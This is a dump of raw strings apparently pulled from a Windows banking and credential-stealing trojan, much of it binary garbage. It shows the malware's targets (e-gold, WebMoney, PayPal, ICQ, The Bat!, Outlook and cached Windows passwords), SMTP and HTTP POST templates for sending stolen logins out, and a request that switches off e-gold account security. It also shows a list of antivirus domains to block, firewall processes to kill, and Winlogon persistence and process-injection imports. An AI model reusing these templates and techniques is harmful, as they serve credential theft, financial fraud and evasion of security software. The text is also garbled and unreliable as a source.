jjj jjj jjj jjjj jjj jjj jjj jjj jjh jjh jjh jjjj jjjj jjjj jjj jjh jjjj jjj jjh jjj jjh jjjjj jjh jjj jjj jjj jjj jjj jjjjj jhd jjj jjj jhd jjjj jjj jjj jjjj jjjj jjj jjj .text .data .rsrc rtg0er65eRATDF052[-- 1x^VW2 ?gzipu text ai.au4` c=AS GGv QPh gfi tPj5(F aKu Edit :-vtRP^ GWV ChzS PSRT DGs dQnS lhPd @tpg SaE W



Login confirmation



WVS >Refeu rer:u ?PIN GIu AQWP Itr >gen3ug .aspu^ "uGRh> xistuV ecuruMf IDuE` ?valuu xistuK utoIuB` ?valuu jumbuQf o"uI YQPh XhN VhU ?PltMu anagu gen=u TOKEu TID=u statu _id=u tid=u QVWSR acctu5 netiu, mepiu# n.asu umW ?TuriuQf nguI GWh WVS thV ?t ?/TD>u ?t ?u ?httpue DatauO PhVN ukh PSite: %s | %s Outlook: %s | %s PhSO u9hk Phk0 hLA hXA Phk0 %s\%s\%s hpS QQQ +WVSU hSW hgA VWS t5hk0 Phk @tDj SVW3 tMj SVW [kwm img]f PRj RRhAI X-Yc grci.info ydsvgd.dll PQVW VWQ SXj@WS FMt0 j@WS kXt^ SUV j@SV SUV SVW DAN NLD NLB ENU ENG ENA ENC ENZ ENI FIN FRA FRB FRC FRS DEU DES DEA ISL ITA ITS NOR NON PTB PTG SVE ESP ESM ESN TRK PLK CSY SKY HUN RUS GRE XXX SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\ :*:Enabled:explorer VWS WVSP 9POSTt 9postt 9Post hsB PQhyB WPS /WhK jPVP Ot]h hQc IQP jRh Ph!t PPTh XXj hTX HHP HELO hQc hQc hQc hQc hQc hQc ugh hQc hQc tuh[M hTX PhP hTX PhP Qhc3 ?asswu ord UIN Phw, @tjHj @tDHh PhH Phe1 =reeruPj =BCOOu, =passuUj Phe1 =PriouPj =Hide hTX =Killuxj hTX QhP =Find XSj =bstsu =bwduuH QPj QPj QPj =000Zuf tBh =cdlnux =rlkeu-h{N =rlkdu3 =slkgu =gcfgu =scfgui =mlflu* =plcgu@j =plcsuj =nkknuW =delvux =BIN1uB =STR1uB =HEX1uC =delku0 =lliku =rtagu' =rtasu# =fddou* =onss PhY =mttgu$ =kcldu =mttsu =lpwsu =rpwsu =wohs XPj QPP QRP =yalpuK PhCr hCr =ksedu_ =GhcWuD =gsemu! =ogrdu WVP QPQ =sgrdu& =MPsrumj hkM =MParuBj hwM =MPvruZ 8QWP =beepu =lgofu =fnipu =gnipu PhT1 V=co =vmeru GGW COu QPj $XYY t,VW tFhq| @PPhq| dr$h t)@t&Hf sdt jdh tDhB2 tWhR2 ucjdh PPh YPQP hQc hQc hQc hQc hQc hQc ueh hQc hQc CMNDt jch Phu Vhu Vhu Vhu Phu Vhu Vhu Vhu hLD Vhu hLD Vhu Vhu Vhu .exeudh hTX httpu Fhu PhG haD WVSj PhM, Pha) tdh) .txtW .txtu ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/_U3 HELO ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/U hTX Php PQj hTX PQj uXj t)@t&H >wwu >WWu RCPT TO:<%s> ID:%s MAIL:%s DATA QUIT From: %s %s <%s> Message-ID: <%u%u> Login: %s Pass: %s Subject: *%s* Subject: *%s* MIME-Version: 1.0 Content-Type: multipart/mixed; boundary="----------3E1821061EE37A68" ------------3E1821061EE37A68 Content-Type: text/plain; charset=Windows-1251 Content-Transfer-Encoding: 8bit mail ------------3E1821061EE37A68 Content-Type: %s; name="%s" Content-Transfer-Encoding: base64 Content-Disposition: attachment; filename="%s" ----------3E1821061EE37A68-- application/octet-stream TO: HAXOR <%s> text/plain SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\ydsvgd Software\Microsoft\Windows\CurrentVersion\App Paths\WinRar.exe Software\Microsoft\Windows\CurrentVersion Software\Microsoft\Windows NT\CurrentVersion Software\WebMoney Software\Miranda \SOFTWARE\Mirabilis\ICQ\NewOwners SOFTWARE\Mirabilis\ICQ\Owners WM Keeper Detected \ydsvgd.dll hws mpr.dll WNetEnumCachedPasswords PasswordSave PasswordSaved LoginSaved ; MIRANDA: not Phone_0 USER32.dll ddraw.dll DirectDrawCreate set cdaudio door open set cdaudio door closed *.dat *\open A-311 Death welcome \lps.dat PASSWRD \kps001.sys RegisteredOwner RegisteredOrganization Install_Dir Exe ; Cached passwords: ; ICQ: Shell_TrayWnd ToolbarWindow32 Button TrayClockWClass TrayNotifyWnd SysListView32 Phones Phone1 wsprintfA IPHLPAPI.DLL GetTcpTable GetUdpTable CID secureTIME HTTP/1.0 200 OK From: %s ; %d.%d %d:%d Connection: %s User: %s Password: %s Domain: %s ; RAS: Phone: %s Primary DNS: %d.%d.%d.%d Secondary DNS %d.%d.%d.%d System\CurrentControlSet\Control\MPRServices\TestService System\CurrentControlSet\Control pstorec.dll SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify A-311 Dea h proxy v 1.6
404 Not found
ntoskrnl.exe ZwTerminateProcess ycsvgd.sys qo.sys \kgctini.dat IP: %s UNKNOWN ; Module: WebMoney.exe SnmpExtensionQuery inetmib1.dll SeDebugPrivilege SeShutdownPrivilege wininet.dll HttpSendRequestA \History.IE5\index.dat From History: Ebay:%u E-gold:%u Paypal:%u History Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders Startup \winupdt.exe \dt163.dt \mnsvgas.bin \tnstt.exd \gsvga.bin \shsvga.bin \wmx.exd explorer.exe iexplore.exe opera.exe myie.exe mozilla.exe thebat.exe outlook.exe msn.exe icq.exe A311Init avp.ch customer.symantec.com dispatch.mcafee.com download.mcafee.com avp.com avp.ru awaps.net virustotal.com engine.awaps.net f-secure.com updates.drweb-online.com ftp.kaspersky.ru rads.mcafee.com ftp.sophos.com liveupdate.symantec.com kaspersky.com kaspersky-labs.com kaspersky.ru liveupdate.symantecliveupdate.com mast.mcafee.com mcafee.com my-etrust.com networkassociates.com phx.corporate-ir.net securityresponse.symantec.com service1.symantec.com sophos.com spd.atdmt.com symantec.com trendmicro.com update.symantec.com updates.symantec.com us.mcafee.com u2.eset.com zapro.exe vsmon.exe jamapp.exe atrack.exe iamapp.exe FwAct.exe mpfagent.exe outpost.exe zlclient.exe mpftray.exe GET /%s HTTP/1.0 User-Agent: MSIE6.1 Host:%s Connection: Keep-Alive POST /%sdata.php?id=%s HTTP/1.1 User-Agent: MSIE 5.3 (xpsp2-14087) Host: %s Content-Length: %u Content-Type: multipart/form-data; boundary=---------------------------41184676334 Connection: Keep-Alive Pragma: no-cache Content-Disposition: form-data; name="user" Content-Disposition: form-data; name="info" ABCDEFGHIJKLMNOPQRSTUVWXYZqvrnuytrew1234567890 CommonFilesDir qo.dll ZoneLabs\vsmon.exe \PFWShared\idsxres.dll SOFTWARE\Agnitum\Outpost Firewall Engine.dll SOFTWARE\Agnitum\Outpost Firewall\Paths ydsvgd.dll EntryPoint XWD33Sifix StackSize DllName Startup Impersonate Asynchronous MaxWait jumbo= /acct/ai.asp www.e-gold.com POST GET ExistingSecurityID= ExistingAutoID= `Referer: https://www.e-gold.com/acct/ai.asp?c=AS Content-Type: application/x-www-form-urlencoded UpdateAttribs=Update+Account+Sentinel++Settings&SecurityLevelConnection=Disabled&SecurityLevelComputer=Disabled&AutomationMode=*&PhoneMode=DISABLED&ExistingPhoneID=0& TAN: \ttsvga.dat \%u.tmp \\.\pipe\311 \\.\pipe\311iexplore \\.\pipe\311myie \\.\pipe\311msn \\.\pipe\311mozilla \\.\pipe\311thebat \\.\pipe\DDSfour \\.\pipe\311msimn \\.\pipe\311icq \\.\pipe\311opera -==; Account ; Protected Storage: PStoreCreateInstance internet explorer http:// wininetcachecredentials identification inetcomm server passwords SOFTWARE\Microsoft\Internet Account Manager\Accounts Identities POP3 Password2 POP3 Server POP3 User Name IMAP Password2 IMAP Server IMAP User Name Files (%s): Error. Try do it later! SOFTWARE\RIT\The Bat! Working Directory %s ; mailserv: %s ; password: %s \account.cfg ; TheBat passwords GET /%swx.php?wxx=%s&uid=%s HTTP/1.0 User-Agent: Windows Updater Host: www.%s Connection: Keep-Alive GET Content-Disposition: form-data; name="pngname" Content-Disposition: form-data; name="pngsize" Content-Disposition: form-data; name="pngdata"; filename="x%u%u.png" Content-Type: image/png ?domRD= SOFTWARE\Microsoft\Internet Explorer\Main Search Page Local Page Start Page First Home Page Default_Search_URL \tqpf00.exe Default_Page_URL POST /%s HTTP/1.1 User-Agent: MSIE 6.0 wxpsp2.13061 Host: %s Content-Length: %u Content-Type: application/x-www-form-urlencoded Connection: Keep-Alive Pragma: no-cache D:\WINDOWS\system32\kgctini.dat PASSWRD grci.info e.com D:\Software\Rapport\procexp exe D:\WINDOWS\system32\lps.dat fotravel.com B:\Caches\Temp\W01083060Z \\.\pipe\311procexp lstrlenA lstrcpynA lstrcpyA CloseHandle ConnectNamedPipe CopyFileA CreateDirectoryA CreateEventA CreateFileA CreateFileMappingA CreateNamedPipeA CreateProcessA CreateRemoteThread CreateThread CreateToolhelp32Snapshot DeleteFileA DeviceIoControl ExitProcess ExitThread FindClose FindFirstFileA FindNextFileA FreeLibrary GetCurrentProcess GetCurrentProcessId GetCurrentThreadId GetDriveTypeA GetFileAttributesA GetFileSize GetFullPathNameA GetLocalTime GetLogicalDriveStringsA GetModuleFileNameA GetModuleHandleA GetPriorityClass GetProcAddress GetProcessHeap GetStartupInfoA GetSystemDefaultLangID GetSystemDirectoryA GetTempPathA GetTickCount GetVersionExA GetVolumeInformationA GetWindowsDirectoryA GlobalAddAtomA GlobalAlloc GlobalDeleteAtom GlobalFindAtomA GlobalFree GlobalGetAtomNameA GlobalLock GlobalUnlock HeapAlloc HeapFree IsBadCodePtr LoadLibraryA LoadLibraryExA LocalAlloc LocalFree LockFile MapViewOfFile MoveFileA MultiByteToWideChar OpenProcess Process32First Process32Next ReadFile RemoveDirectoryA RtlZeroMemory SetCurrentDirectoryA SetFileAttributesA SetFilePointer SetLocalTime SetPriorityClass SetThreadPriority Sleep TerminateProcess TerminateThread UnmapViewOfFile VirtualAlloc VirtualAllocEx VirtualProtectEx WaitForSingleObject WideCharToMultiByte WriteFile WriteProcessMemory _llseek _lread _lwrite lstrcatA lstrcmpA lstrcmpiA lstrlenA lstrcpynA lstrcpyA CloseHandle ConnectNamedPipe CopyFileA CreateDirectoryA CreateEventA CreateFileA CreateFileMappingA CreateNamedPipeA CreateProcessA CreateRemoteThread CreateThread CreateToolhelp32Snapshot DeleteFileA DeviceIoControl ExitProcess ExitThread FindClose FindFirstFileA FindNextFileA FreeLibrary GetCurrentProcess GetCurrentProcessId GetCurrentThreadId GetDriveTypeA GetFileAttributesA GetFileSize GetFullPathNameA GetLocalTime GetLogicalDriveStringsA GetModuleFileNameA GetModuleHandleA GetPriorityClass GetProcAddress GetProcessHeap GetStartupInfoA GetSystemDefaultLangID GetSystemDirectoryA GetTempPathA GetTickCount GetVersionExA GetVolumeInformationA GetWindowsDirectoryA GlobalAddAtomA GlobalAlloc GlobalDeleteAtom GlobalFindAtomA GlobalFree GlobalGetAtomNameA GlobalLock GlobalUnlock HeapAlloc HeapFree IsBadCodePtr LoadLibraryA LoadLibraryExA LocalAlloc LocalFree LockFile MapViewOfFile MoveFileA MultiByteToWideChar OpenProcess Process32First Process32Next ReadFile RemoveDirectoryA RtlZeroMemory SetCurrentDirectoryA SetFileAttributesA SetFilePointer SetLocalTime SetPriorityClass SetThreadPriority Sleep TerminateProcess TerminateThread UnmapViewOfFile VirtualAlloc VirtualAllocEx VirtualProtectEx WaitForSingleObject WideCharToMultiByte WriteFile WriteProcessMemory _llseek _lread _lwrite lstrcatA lstrcmpA lstrcmpiA RegNotifyChangeKeyValue CloseServiceHandle CreateServiceA DeleteService GetUserNameA LookupPrivilegeValueA OpenProcessToken OpenSCManagerA OpenServiceA RegCloseKey RegCreateKeyA RegCreateKeyExA StartServiceA RegSetValueExA RegQueryValueExA RegOpenKeyExA AdjustTokenPrivileges RegEnumValueA RegEnumKeyExA RegEnumKeyA RegDeleteValueA RegDeleteKeyA BitBlt CreateCompatibleDC CreateDCA CreateDIBSection DeleteDC DeleteObject GetDIBColorTable GetDeviceCaps SelectObject SetDIBitsToDevice CreateStreamOnHGlobal CoTaskMemFree RasEnumEntriesA RasGetEntryPropertiesA RasGetEntryDialParamsA ShellExecuteA ShowWindow SetWindowsHookExA SetWindowTextA SetSysColors SetDoubleClickTime SetCursorPos SetClipboardData SendMessageA OpenClipboard MessageBoxA MessageBeep IsWindowVisible IsWindowEnabled GetWindowThreadProcessId GetWindowTextA SwapMouseButton GetWindowDC GetKeyboardState GetKeyNameTextA GetForegroundWindow GetFocus GetDlgItemTextA GetDesktopWindow GetCursorPos GetClipboardData GetClassNameA FindWindowA ExitWindowsEx EnumWindows EnumChildWindows EnableWindow CloseClipboard CharLowerA CallNextHookEx ToAscii UnhookWindowsHookEx GetWindowRect wsprintfA InternetQueryDataAvailable InternetReadFile HttpOpenRequestA HttpSendRequestA InternetConnectA InternetGetConnectedState InternetOpenA PlaySoundA mciSendStringA PDMt .text `.rdata @.data .reloc Fvt pUQ9] lstrlenA 'cpy CloseHu onneK dPip#K reateDirBory#E Mapp- Remo Soolhelp32Sn Dele VIo xit Cur#n >